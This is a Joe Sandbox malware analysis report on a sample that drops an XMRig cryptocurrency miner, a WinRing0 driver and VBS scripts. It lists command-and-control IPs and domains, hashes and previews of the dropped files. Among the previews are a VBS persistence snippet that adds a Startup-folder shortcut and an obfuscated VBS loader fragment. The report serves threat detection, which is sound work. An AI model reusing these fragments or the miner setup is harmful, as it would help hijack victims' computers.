Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
216.108.230.28	dLjDyYwmk2.exe	Get hash	malicious	Browse	216.108.230.28/ActiveX5552.VBS
200.83.148.79	dLjDyYwmk2.exe	Get hash	malicious	Browse
200.83.148.79	DE6F299B2A486C690D8F45A32AC85A7F3AE317771B2D4.exe	Get hash	malicious	Browse
64.235.37.55	6LcKWBGpsJ.exe	Get hash	malicious	Browse
64.235.37.55	kN6q5LUExs.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
updatebss.linkpc.net	6LcKWBGpsJ.exe	Get hash	malicious	Browse	64.235.37.55
updatebss.linkpc.net	kN6q5LUExs.exe	Get hash	malicious	Browse	64.235.37.55
soloformin.linkpc.net	6LcKWBGpsJ.exe	Get hash	malicious	Browse	216.108.230.28
soloformin.linkpc.net	kN6q5LUExs.exe	Get hash	malicious	Browse	216.108.230.28

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PREMIANETUS	6LcKWBGpsJ.exe	Get hash	malicious	Browse	64.235.37.55
	kN6q5LUExs.exe	Get hash	malicious	Browse	64.235.37.55
	Yeni sipari#U015f _No.129099, pdf.exe	Get hash	malicious	Browse	72.18.200.110
	dLjDyYwmk2.exe	Get hash	malicious	Browse	216.108.230.28
	yw44oofZdn.exe	Get hash	malicious	Browse	72.18.200.194
	SecuriteInfo.com.Trojan.Injector.4383.exe	Get hash	malicious	Browse	72.18.200.194
	gqtdsOpAyE.exe	Get hash	malicious	Browse	216.108.228.52
	vbO1f1iNMqied.dll	Get hash	malicious	Browse	216.108.227.55
	BSqkBHxMo05jQk.dll	Get hash	malicious	Browse	216.108.227.55
	8EeVCUDtp.dll	Get hash	malicious	Browse	216.108.227.55
	y1sfKD0C.dll	Get hash	malicious	Browse	216.108.227.55
	BSqkBHxMo05jQk.dll	Get hash	malicious	Browse	216.108.227.55
	vbO1f1iNMqied.dll	Get hash	malicious	Browse	216.108.227.55
	euYvmDGSDBHQUI.dll	Get hash	malicious	Browse	216.108.227.55
	8EeVCUDtp.dll	Get hash	malicious	Browse	216.108.227.55
	y1sfKD0C.dll	Get hash	malicious	Browse	216.108.227.55
	3ciYayI6wGOHn1.dll	Get hash	malicious	Browse	216.108.227.55
	Ae4L3BZnN.dll	Get hash	malicious	Browse	216.108.227.55
	rhMdEUWm8pr.dll	Get hash	malicious	Browse	216.108.227.55
	ZIt8cqt180gNP.dll	Get hash	malicious	Browse	216.108.227.55
VTRBANDAANCHASACL	vWVU0941xB	Get hash	malicious	Browse	190.47.23.37
	aOJIPFMmUb	Get hash	malicious	Browse	190.47.23.24
	LJDfsjRAd4	Get hash	malicious	Browse	190.100.60.131
	GBuHaXRK8g	Get hash	malicious	Browse	201.239.99.188
	b6pO3D90hh	Get hash	malicious	Browse	186.156.236.95
	4wdptue34h	Get hash	malicious	Browse	190.160.227.66
	apep.arm7	Get hash	malicious	Browse	190.160.252.12
	apep.arm	Get hash	malicious	Browse	190.100.175.142
	448RVIM193	Get hash	malicious	Browse	190.160.252.15
	IHrIOOOJnJ	Get hash	malicious	Browse	201.239.99.163
	arm7	Get hash	malicious	Browse	190.161.25.191
	pandora.x86	Get hash	malicious	Browse	190.162.87.243
	layerx86	Get hash	malicious	Browse	200.120.176.252
	e7N7Kz9Bar	Get hash	malicious	Browse	190.46.233.151
	4nhK64uyaT	Get hash	malicious	Browse	190.160.28.102
	2LdAHZ7ym6	Get hash	malicious	Browse	190.46.122.34
	b3astmode.arm	Get hash	malicious	Browse	190.163.66.206
	N4yXjBwzNy	Get hash	malicious	Browse	186.156.236.83
	E5beoOxren	Get hash	malicious	Browse	190.46.234.184
	sora.x86	Get hash	malicious	Browse	190.46.234.160

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\eWTBqYYAek\svhproxy	zj7Of9sytj.exe	Get hash	malicious	Browse
C:\ProgramData\eWTBqYYAek\svhproxy	Purchase Order.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys	6LcKWBGpsJ.exe	Get hash	malicious	Browse
	kN6q5LUExs.exe	Get hash	malicious	Browse
	RNOk6sYeow.exe	Get hash	malicious	Browse
	pYFaVXLPjQ.exe	Get hash	malicious	Browse
	3Ub5qg8MIx.exe	Get hash	malicious	Browse
	LjsXasNt82.exe	Get hash	malicious	Browse
	Windows_Defender.exe	Get hash	malicious	Browse
	build.exe	Get hash	malicious	Browse
	WindowsDefender.exe	Get hash	malicious	Browse
	build.exe	Get hash	malicious	Browse
	updater.exe	Get hash	malicious	Browse
	build.exe	Get hash	malicious	Browse
	nazi.exe	Get hash	malicious	Browse
	csghost 4.0.exe	Get hash	malicious	Browse
	Vvm73xZcVk.exe	Get hash	malicious	Browse
	61wg87Mp5s.exe	Get hash	malicious	Browse
	xwBgnRX7mc.exe	Get hash	malicious	Browse
	7uvkuUP9Ki.exe	Get hash	malicious	Browse
	JuBFlRMNEa.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	6LcKWBGpsJ.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	kN6q5LUExs.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x045609e3, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2506933792675032
Encrypted:	false
SSDEEP:	384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
MD5:	2F5AFF7EF8E3AEEC72C7D256AF6BD53C
SHA1:	7FEAE83897D2758118FAFD888CA4F9C9DD2CB94A
SHA-256:	A8DBD99F11428A8B4A239EB383AE9690703752A7E6F39D43E3BF6836A305B8D9
SHA-512:	05C2830B31B9142083731574D106603132759472D8DB29491BFA576492F9348A6A35DE78126955EC143A40A5D0549007DFF3ECCA705A1EA50A2B8CAF0E7D523B
Malicious:	false
Preview:	.V..... ................e.f.3...w........................&..........w...)...z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...........................................................................................................................................................................................................................................)...z.i.....................)...ze.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\eWTBqYYAek\7349a13a3b_3.1.0

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	3272
Entropy (8bit):	3.4831940636144405
Encrypted:	false
SSDEEP:	24:2eWWWWWeWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWLR7WWWWWWWWWWWWWWWWv:ZRHh9
MD5:	762E324324EE4380EEB68216FE67DE70
SHA1:	6CAC818A2172BF9F46F061520E2A078E80EBB71A
SHA-256:	AC64C7AC08F1BEED8C8A74F293EC35E5703AB1D93C1B5FE9BAE2AAF63BD3F6A1
SHA-512:	07BE20AD444FC122463416EFEC632B672588B9F96B781B127B668E6942993A864CE4CE2FD9A8BC96EEC92087F095ED182A612E8B9D001C300A865585946ECF34
Malicious:	false
Preview:	..................25789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858H125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125_LMB...JXTZ^_C_\Y.U[Z_FZ.VPL...VXV_[S.BAC85801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892

C:\ProgramData\eWTBqYYAek\cfg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2020
Entropy (8bit):	5.5270519198211145
Encrypted:	false
SSDEEP:	48:lCHUL3qQEzCmini9iqvciaXkgOGuS1MWr7bv4:EH9QWv/iuS1Me7bv4
MD5:	7E2B4B7CAF10CEAA5F7B20AEDEFCB5D0
SHA1:	DDB1EDFB2E0DC6CE94954B39DD4EA5DE6A59171E
SHA-256:	94A28A11093ACD3C9F42A19B529FCE0E798EFB7C1F92194FCEBDF4C0321EC834
SHA-512:	8F54A36B48EA071B47C0DB9C7354B13E826F515FFFDC066781E2A0A1C9B9D3766F6C2B9EB9F774997B4CCE04B193B47B12F6A162C5947CE933620F1771E9D7C6
Malicious:	false
Preview:	ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki

C:\ProgramData\eWTBqYYAek\cfgi

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2020
Entropy (8bit):	5.526766817161153
Encrypted:	false
SSDEEP:	48:lCHUL3qQEzlmini9iqvciaXkgOGuS1MWr7bv4:EH9QZv/iuS1Me7bv4
MD5:	540A8EA357C60E3D651C0C3689E946C4
SHA1:	76C4764F82F1D9E2FA0D35A2CED07FBF7DEBB74D
SHA-256:	3FF55B1B1C2FE6BE8B3BE4521C53624AA7BE0F29FE814172F62DF31E2165389F
SHA-512:	CFCC5AB7D6A0A810EC4D25018BC38B48DC038FE8CD518AD71B93FF43A5D1671FC2C98B80B2D83C2987D35470D2D106B5E45B9F3088422DA29911EECB5BB1BFA7
Malicious:	false
Preview:	ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki

C:\ProgramData\eWTBqYYAek\r.vbs

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	660
Entropy (8bit):	3.6299521995339563
Encrypted:	false
SSDEEP:	12:DJhvugypjBQMyogMJsW+jCRAbjMAIxiDHvhFkqy30mgZM3LCKKvbimoxYFHkqm3H:DJhLqyjCyjMqFNyEmgZMbaDimoKFHNc
MD5:	1E11952E119BBB26FAF30CE2ADBF41F3
SHA1:	0E868A98177E90B235B5605F5B27D8E9FC3372E1
SHA-256:	1F754EDEE5BDF5B5937D15B6D6DFC1BDC3757EAD26D9F7451A5983D8AFBC750B
SHA-512:	6A84B5CCE17FEBF0F2EFFEAA32BFF733CF68A71623F5F46C15E5ABF08FB7D9BE96AF08A83CC5E244B5223854A01FE95E8D5264303D783CF38F2C547ACC987E79
Malicious:	false
Preview:	S.e.t. .o.b.j.F.S.O.=.C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).....o.u.t.F.i.l.e.=.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.S.t.a.r.t.u.p.\.g.t.Y.L.g.G.e.d.B.Q...u.r.l.".....S.e.t. .o.b.j.F.i.l.e. .=. .o.b.j.F.S.O...C.r.e.a.t.e.T.e.x.t.F.i.l.e.(.o.u.t.F.i.l.e.,.T.r.u.e.).....o.b.j.F.i.l.e...W.r.i.t.e. .".[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.].". .&. .v.b.C.r.L.f. .&. .".U.R.L.=.".".f.i.l.e.:./././.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.e.W.T.B.q.Y.Y.A.e.k.\.s.v.h.p.r.o.x.y...e.x.e.".".".....o.b.j.F.i.l.e...C.l.o.s.e.......

C:\ProgramData\eWTBqYYAek\svhproxy

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32912
Entropy (8bit):	6.539596980384053
Encrypted:	false
SSDEEP:	768:gaY8bp49YK+2Cza0pS6icHmMl9CvwOElkn3yKdnHGPUViG:dd4+KTMVJHmMsEBKdnmcVh
MD5:	EC0A2E5708E3FC63D01C6ABFE522C1D9
SHA1:	43F0DAA1B0140CE33DF7C7BEB2BC6D29998E73C6
SHA-256:	B4D5E62D37B4736FBDCB99CEDDE24DB4901CFEA27562E9BD354F719C9C89604C
SHA-512:	725AD5C78F71588F56C139A40DB4456B977C89876B57510B1CAC04BFCFDD4C74C898853ABB233EA6124A0114A9D87A6647CA856061FCED92A5D570B429FC014F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: zj7Of9sytj.exe, Detection: malicious, Browse Filename: Purchase Order.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......02\|.tS..tS..tS..\O.pS..tS...S..S.i.wS..S.o.vS..S.\|.rS..S...cS..S.n.uS..S.j.uS..RichtS..........................PE..L.....{Z.................N..........aM.......`....@.................................~.....@...... ..........................\|T..P.......L............f..................................................@............................................text...rM.......N.................. ..`.data...\....`.......R..............@....rsrc...L............T..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\AudioClip.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.278948378331044
Encrypted:	false
SSDEEP:	12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk7v:ML2pBLaYgioQF
MD5:	CB9A918AA4F64DF8162B857C63195287
SHA1:	70E078D64F44CCB2BD89B106204E14D9E3B58894
SHA-256:	104503FEB03BB8F7D338CDB64A0B2E2B608A966BDFE899142C9762B2D21F9260
SHA-512:	3C1EB042EA3D9892271ADD759E516FE626209D2F5F5EC25A309380F16935FE8640B4751529CD6B5826D387DED9F7F2069F54095BCA7F3A19AE2116B81C30595B
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\services.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\01Atodo\services.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	265
Entropy (8bit):	5.2500108375008665
Encrypted:	false
SSDEEP:	6:Q3LadLCR22IAQykdL1OLCRoH+9GLhz9tv:Q3LaJU20NaL10Ug+9Yz9tv
MD5:	7E677F275A9B506F7C2709E4DE94C94B
SHA1:	F6378ECA8DDA8E14D83ED6B60B1AEC2C88DE3A17
SHA-256:	CC0A222035CA309B1CFF546FE651EAD6695F2D518ED66E2121723873B6E28F31
SHA-512:	2F4DC7DF9F893F7472BFBEF64361897B5F8F894DAE04D178D0154F2A0FE5A49492A9CD2283E237FF9EDF089456B56BB705F9C5C3C065905B2CCD787C467C9F3B
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	4.328310677437976
Encrypted:	false
SSDEEP:	768:8vWBNcW49rYpBGtDkUhW+37M+pWnwSMzzUlKq0NMxhrml8cHIbeMv9C5OQcASvYv:rBNq9jtD7UwPq0OHS6cHIGVxSvYJ2pz0
MD5:	1F22C6DBDF4806A6ADB969CB6E548400
SHA1:	E2C757824AAB59BAC5061428F3AB3F90497AB96A
SHA-256:	9A0A3E5296478E7822D92BF8B2C4AF3E18203C6E65A47BE5C65594F376576733
SHA-512:	7510BD7FA66F447999E116F42C5C86D799D4CCD036BBE407124F0369946DBCF136EA251BC56C94AED4418CAAE2A845A8006FD9DEE069724F1D65728D23A021FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 34%, Browse Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: 6LcKWBGpsJ.exe, Detection: malicious, Browse Filename: kN6q5LUExs.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.Yb................................. ........@.. ....................... ............@.....................................W.......@...........................L................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......X%...............$...............................................0...........(.....o.......(.....+......0.............s....... ....o.......(....o.......(....o......s........o.....s...........i.X................io.........X...........(......o................-..o........o................-..o..................-..o..........+....(....F.@.........7.l....................0...........(.....o.......(.....+..*....0.............s....... ....o.......(....o.......(....o.....s...

C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	data
Category:	dropped
Size (bytes):	440644
Entropy (8bit):	4.868170870389244
Encrypted:	false
SSDEEP:	768:LeFRDiAOENgDDeD6G9ElmfQFIlL5TpvCMfGdhH+SaWbvCf3tQIMsanm61561561+:t66+
MD5:	FE81B6DAF344D03EC4B8502F556BC522
SHA1:	89E3EB83DFF7423AB0E6B8716028A7DC9E2839FD
SHA-256:	CCAFC4789558E39EFFC997852296CA45004690BF75B52E10AE0C252FBA3CF8C9
SHA-512:	3CBBC4B05757A03DF7A3E7DF4CD165148372BEF362362610B6A1591F66C39A62470C92EC20EE42A0F63C7AD98A6BE72D2D950DFB7B20728DF4357530C061CE37
Malicious:	false
Preview:	Dim ftf7pfsm4jorp7pfkbc..Dim dlvd6giwdussqq7kp..Dim mw1q3kodvoeb0gnxr..Dim tc0x6irye8p54o..Dim rzxkkal7vwilvsdreel..Dim xt23kvaoj0oj..ftf7pfsm4jorp7pfkbc="KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654u" & "KjgHYRrrfdee)=(/655643$%&/(7654t" & "KjgHYRrrfdee)=(/655643$%&/(7654r" & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654H" & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654." & "KjgHYRrrfdee)=(/655643$%&/(7654

C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 6LcKWBGpsJ.exe, Detection: malicious, Browse Filename: kN6q5LUExs.exe, Detection: malicious, Browse Filename: RNOk6sYeow.exe, Detection: malicious, Browse Filename: pYFaVXLPjQ.exe, Detection: malicious, Browse Filename: 3Ub5qg8MIx.exe, Detection: malicious, Browse Filename: LjsXasNt82.exe, Detection: malicious, Browse Filename: Windows_Defender.exe, Detection: malicious, Browse Filename: build.exe, Detection: malicious, Browse Filename: WindowsDefender.exe, Detection: malicious, Browse Filename: build.exe, Detection: malicious, Browse Filename: updater.exe, Detection: malicious, Browse Filename: build.exe, Detection: malicious, Browse Filename: nazi.exe, Detection: malicious, Browse Filename: csghost 4.0.exe, Detection: malicious, Browse Filename: Vvm73xZcVk.exe, Detection: malicious, Browse Filename: 61wg87Mp5s.exe, Detection: malicious, Browse Filename: xwBgnRX7mc.exe, Detection: malicious, Browse Filename: 7uvkuUP9Ki.exe, Detection: malicious, Browse Filename: JuBFlRMNEa.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\01Atodo\config.json

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3100
Entropy (8bit):	4.026748545030507
Encrypted:	false
SSDEEP:	48:CtWTHcfLWHW8b9b2lZ9lCfnnBwT1L8njzL6fM9ELDELfo7VpSdqjg8w4KD5r:CtWTGyHFBwT1L8njzL6fnLQLCSIdWDp
MD5:	A0DBA01E94078BDFE10F5E009C7FD07B
SHA1:	335E2A7062DAF6A4734CC8D1F37357C34B422F32
SHA-256:	AADED7409385C20E0DC387F4F3CEA4EDE28FCA86FADA3CE770B75EDC459EF13A
SHA-512:	96D9C3CD2405E7073B59966BCE9174B8174E33BA8C47594594A11487DF07A09F831BC92177FCE64B11718B493269B39CE6483DAB3567783AE1E38D4AED44DD10
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\01Atodo\config.json, Author: Joe Security
Preview:	{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "asm": true,. "argon2-impl": null,. "astrobwt-max-size": 550,. "astrobwt-avx2": false,. "argon2": [0, 1],. "astrobwt": [0, 1],. "astrobwt/v2": [0, 1],. "cn": [. [1, 0],.

C:\Users\user\AppData\Roaming\01Atodo\del.bat

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	361
Entropy (8bit):	4.987294900951557
Encrypted:	false
SSDEEP:	6:h2mdkRZvMkRZvMkRZvMkRZvE2IvE2rK9wLBCTbAbfJv8fmJzg2rhLRYU:QOkRZvMkRZvMkRZvMkRZv4DYbKkqPhFP
MD5:	44820A88FFC02D6D48D3F754C5495532
SHA1:	72E68426B2D2D10165357D842E9A4C030E0265D6
SHA-256:	24FEC87038D5E581F45771B933C97962E2DA6AEB96A5F2D52589B8392F143DBC
SHA-512:	2B8232AFED3DBB0D881D9E72BB563F80281B5B8542B3FC7C7E6ED9993C3972C55A730F09AE2DFCA11A476414980372C74E79B92533465894ED836FC87F7AF184
Malicious:	false
